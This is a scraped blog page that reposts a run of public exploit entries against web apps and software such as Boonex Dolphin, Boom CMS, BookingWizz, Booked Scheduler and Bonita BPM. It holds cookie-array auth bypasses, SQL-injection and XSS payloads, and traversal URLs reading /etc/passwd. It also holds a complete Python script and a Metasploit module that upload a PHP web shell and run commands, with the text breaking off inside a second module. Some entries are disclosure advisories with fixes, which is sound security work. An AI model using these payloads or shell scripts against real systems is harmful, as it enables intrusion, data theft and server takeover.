# Exploit Title : Boonex Dolphin all versoin <= 7.3 Authentication Bypass
# Exploit Author : Saadat Ullah saadi_linux[@]rocketmail.com
# Software Link : https://www.boonex.com
# Author HomePage : http://security-geeks.blogspot.com
Proof of Concept
File: admin.inc.php
Line: 187
Code: (strcmp($aProfile['Password'], $passwd) != 0)
$passwd is equal to Cookie parameter memberpassword
Bug:
According to PHP documentation strcmp will compare strings, but what if we provide an array???
So, simple bypass is to put two cookies in browser
memberID=1
memberPassword[]=blah --->array
This will allow the attacker to bypass the authentication and can also enter in admin panel.
#Independent Pakistani Security Researcher
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863126067
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/50286/info
Boonex Dolphin is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Boonex Dolphin 6.1 is vulnerable; other versions may also be affected.
http://www.example.com/xml/get_list.php?dataType=ApplyChanges&iNumb=1&iIDcat=(select 1 from AdminMenu where 1=1 group by concat((select password from Admins),rand(0)|0) having min(0) )
# Exploit Title: Boom CMS v8.0.7 - Cross Site Scripting
References (Source): https://www.vulnerability-lab.com/get_content.php?id=2274
Release Date: 2023-07-03
Vulnerability Laboratory ID (VL-ID): 2274
Product & Service Introduction:
===============================
Boom is a fully featured, easy to use CMS. More than 10 years, and many versions later, Boom is an intuitive, WYSIWYG CMS that makes life
easy for content editors and website managers. Working with BoomCMS is simple. It's easy and quick to learn and start creating content.
It gives editors control but doesn't require any technical knowledge.
(Copy of the Homepage:https://www.boomcms.net/boom-boom )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the Boom CMS v8.0.7 web-application.
Affected Product(s):
====================
UXB London
Product: Boom v8.0.7 - Content Management System (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2022-07-24: Researcher Notification & Coordination (Security Researcher)
2022-07-25: Vendor Notification (Security Department)
2023-**-**: Vendor Response/Feedback (Security Department)
2023-**-**: Vendor Fix/Patch (Service Developer Team)
2023-**-**: Security Acknowledgements (Security Department)
2023-07-03: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (User Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A persistent script code injection web vulnerability has been discovered in the official Boom CMS v8.0.7 web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise
browser to web-application requests from the application-side.
The vulnerability is located in the input fields of the album title and album description in the asset-manager module.
Attackers with low privileges are able to add own malformed albums with malicious script code in the title and description.
After the inject the albums are being displayed in the backend were the execute takes place on preview of the main assets.
The attack vector of the vulnerability is persistent and the request method to inject is post. The validation tries to parse
the content by usage of a backslash. Thus does not have any impact to inject own malicious
java-scripts because of its only performed for double- and single-quotes to prevent sql injections.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] assets-manager (album)
Vulnerable Function(s):
[+] add
Vulnerable Parameter(s):
[+] title
[+] description
Affected Module(s):
[+] Frontend (Albums)
[+] Backend (Albums Assets)
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Login to the application as restricted user
2. Create a new album
3. Inject a test script code payload to title and description
4. Save the request
5. Preview frontend (albums) and backend (assets-manager & albums listing) to provoke the execution
6. Successful reproduce of the persistent cross site web vulnerability!
Payload(s):
><script>alert(document.cookie)</script><div style=1
<a onmouseover=alert(document.cookie)>test</a>
--- PoC Session Logs (Inject) ---
https://localhost:8000/boomcms/album/35
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 263
Origin:https://localhost:8000
Connection: keep-alive
Referer:https://localhost:8000/boomcms/asset-manager/albums/[evil.source]
Sec-Fetch-Site: same-origin
{"asset_count":1,"id":35,"name":""><[INJECTED SCRIPT CODE PAYLOAD 1!]>","description":""><[INJECTED SCRIPT CODE PAYLOAD 2!]>",
"slug":"a","order":null,"site_id":1,"feature_image_id":401,"created_by":9,"deleted_by"
:null,"deleted_at":null,"created_at":"2021-xx-xx xx:x:x","updated_at":"2021-xx-xx xx:x:x"}
-
PUT: HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache, private
Set-Cookie: Max-Age=7200; path=/
Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF
VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY
yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;
Max-Age=7200; path=/; httponly
Content-Length: 242
Connection: Keep-Alive
Content-Type: application/json
-
https://localhost:8000/boomcms/asset-manager/albums/[evil.source]
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF
VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY
yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;
-
GET: HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache, private
Set-Cookie:
Vary: Accept-Encoding
Content-Length: 7866
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Vulnerable Source: asset-manager/albums/[ID]
<li data-album="36">
<a href="#albums/20">
<div>
<h3>[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]</h3>
<p class="description">"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p>
<p class='count'><span>0</span> assets</p>
</div>
</a>
</li>
</iframe></p></div></a></li></ul></div></div>
</div>
<div id="b-assets-view-asset-container"></div>
<div id="b-assets-view-selection-container"></div>
<div id="b-assets-view-album-container"><div><div id="b-assets-view-album">
<div class="heading">
<h1 class="bigger b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]></h1>
<p class="description b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p>
</div>
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable title and description parameters.
Restrict the input fields and disallow usage of special chars. Sanitize the output listing location to prevent further attacks.
Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the application is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
# Exploit Title: Bookwyrm v0.4.3 - Authentication Bypass
# Date: 2022-08-4
# Exploit Author: Akshay Ravi
# Vendor Homepage: https://github.com/bookwyrm-social/bookwyrm
# Software Link: https://github.com/bookwyrm-social/bookwyrm/releases/tag/v0.4.3
# Version: <= 4.0.3
# Tested on: MacOS Monterey
# CVE: CVE-2022-2651
# Original Report Link: https://huntr.dev/bounties/428eee94-f1a0-45d0-9e25-318641115550/
Description: Email Verification Bypass Leads To Account Takeover in bookwyrm-social/bookwyrm v0.4.3 Due To Lack Of Ratelimit Protection
# Steps to reproduce:
1. Create a acount with victims email id
2. When the account is created, its ask for email confirmation via validating OTP
Endpoint: https://site/confirm-email
3. Enter any random OTP and try to perfrom bruteforce attack and if otp matches, We can takeover that account
# Exploit Title: BookingWizz Booking System 5.5 - 'bs-services-add.php' SQL Injection
# Dork: N/A
# Date: 27.05.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/booking-system/87919
# Version: 5.5
# Category: Webapps
# Tested on: Kali linux
# Description : The service editing on the admin panel is vulnerable.
An attacker can exploit the entire database using this vulnerable in the
'id' parameter.
====================================================
# PoC : SQLi :
http://www.site.com/booking/bs-services-add.php?id=2
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: id=(SELECT (CASE WHEN (6769=6769) THEN 6769 ELSE 6769*(SELECT
6769 FROM INFORMATION_SCHEMA.PLUGINS) END))
====================================================
1. ADVISORY INFORMATION
========================================
Title: BookingWizz < 5.5 Multiple Vulnerability
Application: BookingWizz
Class: Sensitive Information disclosure
Remotely Exploitable: Yes
Versions Affected: < 5.5
Vendor URL: http://codecanyon.net/item/booking-system/87919
Bugs: Default credentials, CSRF, XXS, SQLi Injection, LFI
Date of Public Advisory: 15 Jun 2016
Author: Mehmet Ince
2. CREDIT
========================================
Those vulnerabilities was identified during external penetration test
by Mehmet INCE from PRODAFT / INVICTUS
Original Advisory:
https://www.mehmetince.net/exploit/bookingwizz-55-multiple-vulnerability
PR1 - Default Administrator Credentials
========================================
File: install.php
People are to lazy to change default credential unless application force
them to do that.
Line 128: <br />Default username/password: <b>admin/pass</b></div>";
PR2 - Cross Site Scripting
========================================
File : eventList.php
// Improper user input validation on
Line 24: $serviceID =
(!empty($_REQUEST["serviceID"]))?strip_tags(str_replace("'","`",$_REQUEST["serviceID"])):getDefaultService();
Line 60: <?php echo SAMPLE_TEXT?> <strong><?php echo VIEW?> <a
href="index.php?serviceID=<?php echo $serviceID?>"><?php echo
CALENDAR?></a></strong>
Payload = 1337" onmouseover="alert(1)
PoC =
http://www.convergine.com/scripts/booking/eventList.php?serviceID=1337%22%20onmouseover=%22alert(1)
PR3 - Local File Inclusion
========================================
File:config.php
Lang variable is under the user control.
Line 31: $lang = (!empty($_REQUEST["lang"])) ? strip_tags(str_replace("'",
"`", $_REQUEST["lang"])) : 'english';
Storing user controlled variable within session variable.
Line 36 - 38 :
if (!empty($_REQUEST["action"]) && $_REQUEST["action"] == "changelang") {
$_SESSION['curr_lang'] = $lang;
}
And using it with include function which cause straightforward file
inclusion.
Line 60 - 68:
$languagePath = MAIN_PATH."/languages/".$_SESSION['curr_lang'].".lang.php";
if(is_file($languagePath)) {
include MAIN_PATH."/languages/".$_SESSION['curr_lang'].".lang.php";
}else{
print "ERROR !!! Language file ".$_SESSION['curr_lang'].".lang.php not
found";
exit();
}
PR4 - SQL Injection
========================================
We've seen a lot of potentially SQL Injection vulnerability during code
review.
2 example can be given for this potential points.
File : ajax/checkDeletedServices.php
line 19 - 20:
$bsid = (!empty($_REQUEST["bsid"])) ? $_REQUEST["bsid"] : array();
$type = (!empty($_REQUEST["type"])) ? $_REQUEST["type"] : 'service';
Line 26:
if($type=='service'){
$service = getService($id);
$name = $service['name'];
}
This function executes query with $id parameter which is user input through
checkDeletedServices.php file.
function getService($id, $field=null) {
$sql = "SELECT * FROM bs_services WHERE id='{$id}'";
$res = mysql_query($sql);
if ($field == null) {
return mysql_fetch_assoc($res);
} else {
$row = mysql_fetch_assoc($res);
return $row[$field];
}
}
File : ajax/checkChangeAvailability.php
Line 19 -21
$id = (!empty($_REQUEST["id"])) ? $_REQUEST["id"] : '';
$interval = getServiceSettings($id,'interval');
getServiceSettings function calls another function named as getService
which is also vulnerable against SQL Injection.
function getServiceSettings($id, $field=null) {
$serviceType = getService($id,'type');
if($serviceType=='t'){
$sql = "SELECT * FROM bs_service_settings bss
INNER JOIN bs_services bs ON bss.serviceId = bs.id
WHERE bss.serviceID='{$id}'";
}else{
$sql = "SELECT * FROM bs_service_days_settings bsds
INNER JOIN bs_services bs ON bsds.idService = bs.id
WHERE bsds.idService='{$id}'";
}
$res = mysql_query($sql);
$row = mysql_fetch_assoc($res);
$row['type'] = $serviceType;
if ($field == null) {
return $row;
} else {
return $row[$field];
}
}
In order to exploit this flaws, Time Based SQLi techniques was used.
Payload: id=1' AND SLEEP(5) AND 'WAlE'='WAlE
PR5 - CSRF
========================================
File: bs-settings.php
This file is reponsible for administrator account settings. Here is the
HTTP POST request.
POST /booking/bs-settings.php HTTP/1.1
Host: www.test.dev
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101
Firefox/36.04
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.test.dev/scripts/booking/bs-settings.php
Cookie: PHPSESSID=1511036c75229f53ae475a0615661394;
__utma=256227097.1395600583.1465982938.1465982938.1465982938.1;
__utmc=256227097;
__utmz=256227097.1465982938.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
wordfence_verifiedHuman=498f28acf0e6151e19053a23c0fbc76b
Connection: close
Content-Type: multipart/form-data;
boundary=---------------------------305761854111129072091034307
Content-Length: 2678
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="new_pass"
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="new_pass2"
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="email"
test@yopmail.com
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="pemail"
test@yopmail.com
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="pcurrency"
CAD
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="tax"
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="time_mode"
0
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="date_mode"
Y-m-d
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="use_popup"
1
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="currency"
$
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="currencyPos"
b
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="lang"
english
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="language_switch"
1
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="timezone"
America/Toronto
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="multi_day_notification"
0
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="multi_day_notification_on"
n
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="single_day_notification"
0
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="single_day_notification_on"
n
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="event_notification"
0
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="event_notification_on"
n
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="cron_type"
cron
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="edit_settings"
yes
-----------------------------305761854111129072091034307--
There is NOT csrf token at all. Furthermore, application does not validated
current password.
--
Sr. Information Security Engineer
https://www.mehmetince.net
# Exploit Title: Bookeen Notea - Directory Traversal
# Date: December 2021
# Exploit Author: Clement MAILLIOUX
# Vendor Homepage: https://bookeen.com/
# Software Link: N/A
# Version: BK_R_1.0.5_20210608
# Tested on: Bookeen Notea (Android 8.1)
# CVE : CVE 2021-45783
# The affected version of the Bookeen Notea System Update is prone to directory traversal vulnerability related to its note Export function.
# The vulnerability can be triggered like so :
# - Create a note or use an existing note on the device
# - rename this note ../../../../../../
# - keep touching the note until a menu appears
# - touch to select "export"
# - touch "View"
# Now you can access and explore the device filesystem.
# Exploit Title: Booked Scheduler 2.7.7 - Authenticated Directory Traversal
# Date: 2020-05-03
# Author: Besim ALTINOK
# Vendor Homepage: https://www.bookedscheduler.com
# Software Link: https://sourceforge.net/projects/phpscheduleit/
# Version: v2.7.7
# Tested on: Xampp
# Credit: İsmail BOZKURT
Description:
----------------------------------------------------------
Vulnerable Parameter: $tn
Vulnerable File: manage_email_templates.php
PoC
-----------
GET
/booked/Web/admin/manage_email_templates.php?dr=template&lang=en_us&tn=vulnerable-parameter&_=1588451710324
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 ***************************
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/booked/Web/admin/manage_email_templates.php
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Cookie: new_version=v%3D2.7.7%2Cfs%3D1588451441;
PHPSESSID=94129ac9414baee8c6ca2f19ab0bcbec
# Exploit Title: Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated)
# Vulnerability founder: AkkuS
# Date: 13/12/2021
# Exploit Author: 0sunday
# Vendor Homepage: https://www.bookedscheduler.com/
# Software Link: N/A
# Version: Booked Scheduler 2.7.5
# Tester on: Kali 2021.2
# CVE: CVE-2019-9581
#!/usr/bin/python3
import sys
import requests
from random import randint
def login():
login_payload = {
"email": username,
"password": password,
"login": "submit",
#"language": "en_us"
}
login_req = request.post(
target+"/booked/Web/index.php",
login_payload,
verify=False,
allow_redirects=True
)
if login_req.status_code == 200:
print ("[+] Logged in successfully.")
else:
print ("[-] Wrong credentials !")
exit()
return login_req.text.split('CSRF_TOKEN" value=')[1].split(";")[0].split('/')[0].split('"')[1]
def upload_shell(csrf):
boundary = str(randint(123456789012345678901234567890, 999999999999999999999999999999))
_headers ={ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
"Accept-Language": "en-US,en;q=0.5",
"X-Requested-With": "XMLHttpRequest",
"Content-Type": "multipart/form-data; boundary=---------------------------"+boundary,
"Origin": target,
"Connection": "close",
"Referer": target + "/booked/Web/admin/manage_theme.php?update"
}
data = "-----------------------------"+boundary+"\r\n"
data += "Content-Disposition: form-data; name=\"LOGO_FILE\"\r\n\n\n"
data += "-----------------------------"+boundary+"\r\n"
data += "Content-Disposition: form-data; name=\"FAVICON_FILE\"; filename=\"simple_shell.php\"\r\n"
data += "Content-Type: application/x-php\r\n\n"
data += "<?php $o = system($_REQUEST[\"cmd\"]);die?>\r\n\n"
data += "-----------------------------"+boundary+"\r\n"
data += "Content-Disposition: form-data; name=\"CSS_FILE\"\r\n\n\n"
data += "-----------------------------"+boundary+"\r\n"
data += "Content-Disposition: form-data; name=\"CSRF_TOKEN\"\r\n\n"
data += csrf + "\r\n"
data += "-----------------------------"+boundary+"--\r\n"
# In case you need some debugging
_proxies = {
'http': 'http://127.0.0.1:8080'
}
upload_req = request.post(
target+"/booked/Web/admin/manage_theme.php?action=update",
headers = _headers,
data = data
#proxies=_proxies
)
def shell():
shell_req = request.get(target+"/booked/Web/custom-favicon.php")
if shell_req.status_code == 200:
print("[+] Uploaded shell successfully")
print("[+] " + target + "/booked/Web/custom-favicon.php?cmd=")
else:
print("[-] Shell uploading failed")
exit(1)
print()
cmd = ''
while(cmd != 'exit'):
cmd = input("$ ")
shell_req = request.get(target+"/booked/Web/custom-favicon.php" + '?cmd='+cmd)
print(shell_req.text)
if len(sys.argv) != 4:
print ("[+] Usage : "+ sys.argv[0] + " https://target:port username password")
exit()
target = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
request = requests.session()
csrf = login()
upload_shell(csrf)
shell()
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => 'Booked Scheduler v2.7.5 - Remote Command Execution',
'Description' => %q{
This module exploits a file upload vulnerability Booked 2.7.5.
In the "Look and Feel" section of the management panel, you can modify the Logo-Favico-CSS files.
Upload sections has file extension control except favicon part.
You can upload the file with the extension you want through the Favicon field.
The file you upload is written to the main directory of the site under the name "custom-favicon".
After upload the php payload to the main directory, Exploit executes payload and receives shell.
},
'Author' => [
'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf Module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://pentest.com.tr/exploits/Booked-2-7-5-Remote-Command-Execution-Metasploit.html'],
],
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
['Booked Scheduler v2.7.5', {}]
],
'DisclosureDate' => '01 March 2019',
'Privileged' => false,
'DefaultTarget' => 0
)
register_options(
[
OptBool.new('SSL', [true, 'Use SSL', false]),
OptString.new('TARGETURI', [true, 'The base path to Booked', '/']),
OptString.new('USER', [true, 'User to login with', 'admin']),
OptString.new('PASS', [true, 'Password to login with', 'admin']),
], self.class)
end
##
# Check Exploit Vulnerable
##
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri, "/Web/index.php")
})
if res and res.code == 200 and res.body =~ /v2.7.5/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
return res
end
##
# Exploit Portion
##
def exploit
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, "/Web/index.php"),
'vars_post' => {
"email" => datastore['USER'],
"password" => datastore['PASS'],
"captcha" => "",
"resume" => "",
"language" => "en_us",
"login" => "submit"
}
})
if res and res.code == 302
print_status("Successful redirection to admin dashboard.")
else
return res
end
get_cookie = res.get_cookies
cookie = get_cookie
##
# Login Access Control
##
control = send_request_cgi({
'method' => 'GET',
'cookie' => cookie,
'uri' => normalize_uri(target_uri, "/Web/dashboard.php")
})
html = control.body
if html =~ /Dashboard/
print_good("Login successfuly")
else
print_status("User information is incorrect. Login failed")
exit 0
end
##
# Reading CSRF Token
##
csrf = send_request_cgi({
'method' => 'GET',
'cookie' => cookie,
'uri' => normalize_uri(target_uri, "/Web/admin/manage_theme.php")
})
html = control.body
if html =~ /Look and Feel/
token = csrf.body.split('CSRF_TOKEN" value=')[1].split(";")[0].split('/')[0].split('"')[1]
print_status("CSRF Token = #{token}")
else
print_status("User information is incorrect. Login failed")
exit 0
end
##
# Loading phase of the vulnerable file
##
boundary = Rex::Text.rand_text_alphanumeric(29)
data2 = "-----------------------------{boundary}"
data2 << "\r\nContent-Disposition: form-data; name=\"LOGO_FILE\"\r\n\r\n\r\n"
data2 << "-----------------------------{boundary}"
data2 << "\r\nContent-Disposition: form-data; name=\"FAVICON_FILE\"; filename=\"akkus.php\""
data2 << "\r\nContent-Type: text/html\r\n\r\n"
data2 << payload.encoded
data2 << "\n\r\n-----------------------------{boundary}"
data2 << "\r\nContent-Disposition: form-data; name=\"CSS_FILE\"\r\n\r\n\r\n"
data2 << "-----------------------------{boundary}"
data2 << "\r\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\r\n\r\n"
data2 << "#{token}"
data2 << "\r\n-----------------------------{boundary}--\r\n"
res = send_request_raw(
{
'method' => "POST",
'uri' => normalize_uri(target_uri, "/Web/admin/manage_theme.php?action=update"),
'data' => data2,
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=---------------------------{boundary}',
},
'cookie' => cookie
})
if res and res.code == 200
print_good "Payload was successfully uploaded."
else
print_error "Upload failed."
return
end
##
# Command execution and shell retrieval
##
print_status("Attempting to execute the payload...")
command = payload.encoded
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri, "/Web/custom-favicon.php"),
'cookie' => cookie
}, 25)
if res and res.code == 200
print_good "Payload executed successfully"
end
end
end
##
# End
##
# Exploit Title: Book Store Management System 1.0.0 - Stored Cross-Site Scripting (XSS)
# Date: 2022-11-08
# Exploit Author: Rajeshwar Singh
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bsms_ci.zip
# Tested on: Windows/XAMPP
###########################################################################
Payload use = "><script>alert("XSS")</script>
1. Visit URL http://localhost/bsms_ci/
2. login with admin Credentials
3. navigate to user Management
4. Click on "Add New System User"
5. Add payload in "Name" input field
6. Click save.
7. Visit http://localhost/bsms_ci/index.php/user
8. XSS payload execute.
source: https://www.securityfocus.com/bid/52183/info
Bontq is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/user/user/userinfo/id/2%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.example.com/user/reports/%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
# Exploit Title: Bonjour Service - 'mDNSResponder.exe' Unquoted Service
Path
# Discovery by: bios
# Discovery Date: 2024-15-07
# Vendor Homepage: https://developer.apple.com/bonjour/
# Tested Version: 3,0,0,10
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Home
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """
Bonjour Service
Bonjour Service
C:\Program Files\Blizzard\Bonjour Service\mDNSResponder.exe
Auto
C:\>systeminfo
Host Name: DESKTOP-HFBJOBG
OS Name: Microsoft Windows 10 Home
OS Version: 10.0.19045 N/A Build 19045
PS C:\Program Files\Blizzard\Bonjour Service> powershell -command
"(Get-Command .\mDNSResponder.exe).FileVersionInfo.FileVersion"
>>
3,0,0,10
#Exploit:
There is an Unquoted Service Path in Bonjour Services (mDNSResponder.exe) .
This may allow an authorized local user to insert arbitrary code into the
unquoted service path and escalate privileges.
Advisory ID: HTB23259
Product: Bonita BPM
Vendor: Bonitasoft
Vulnerable Version(s): 6.5.1 and probably prior
Tested Version: 6.5.1 (Windows and Mac OS packages)
Advisory Publication: May 7, 2015 [without technical details]
Vendor Notification: May 7, 2015
Vendor Patch: June 9, 2015
Public Disclosure: June 10, 2015
Vulnerability Type: Path Traversal [CWE-22], Open Redirect [CWE-601]
CVE References: CVE-2015-3897, CVE-2015-3898
Risk Level: High
CVSSv2 Base Scores: 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N), 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab two vulnerabilities in Bonita BPM Portal (Bonita's web interface running by default on port 8080), which can be exploited by remote non-authenticated attacker to compromise the vulnerable web application and the web server on which it is hosted.
1) Path Traversal in Bonita BPM Portal: CVE-2015-3897
User-supplied input passed via the "theme" and "location" HTTP GET parametres to "bonita/portal/themeResource" URL is not properly verified before being used as part of file name. The attacker may download any system file accessible to the web server user.
Simple PoC code below will return content of "C:/Windows/system.ini" file:
http://[HOST]/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/system.ini
Second PoC will disclose the content of "/etc/passwd" file:
http://[HOST]/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd
2) Open Redirect in Bonita BPM Portal: CVE-2015-3898
Input passed via the "redirectUrl" HTTP GET parametre to "/bonita/login.jsp" script and "/bonita/loginservice" URLs is not properly verified before being used as redirect URL.
After login user may be redirected to arbitrary website:
http://[HOST]/bonita/login.jsp?_l=en&redirectUrl=//immuniweb.com/
-----------------------------------------------------------------------------------------------
Solution:
Update to Bonita BPM 6.5.3
More Information:
http://community.bonitasoft.com/blog/bonita-bpm-653-available
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23259 - https://www.htbridge.com/advisory/HTB23259 - Arbitrary File Disclosure and Open Redirect in Bonita BPM.
[2] Bonita BPM - http://www.bonitasoft.com/ - Bonita BPM for business process applications - the BPM platform that gives developers freedom to create and manage highly customizable business apps.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize
super(
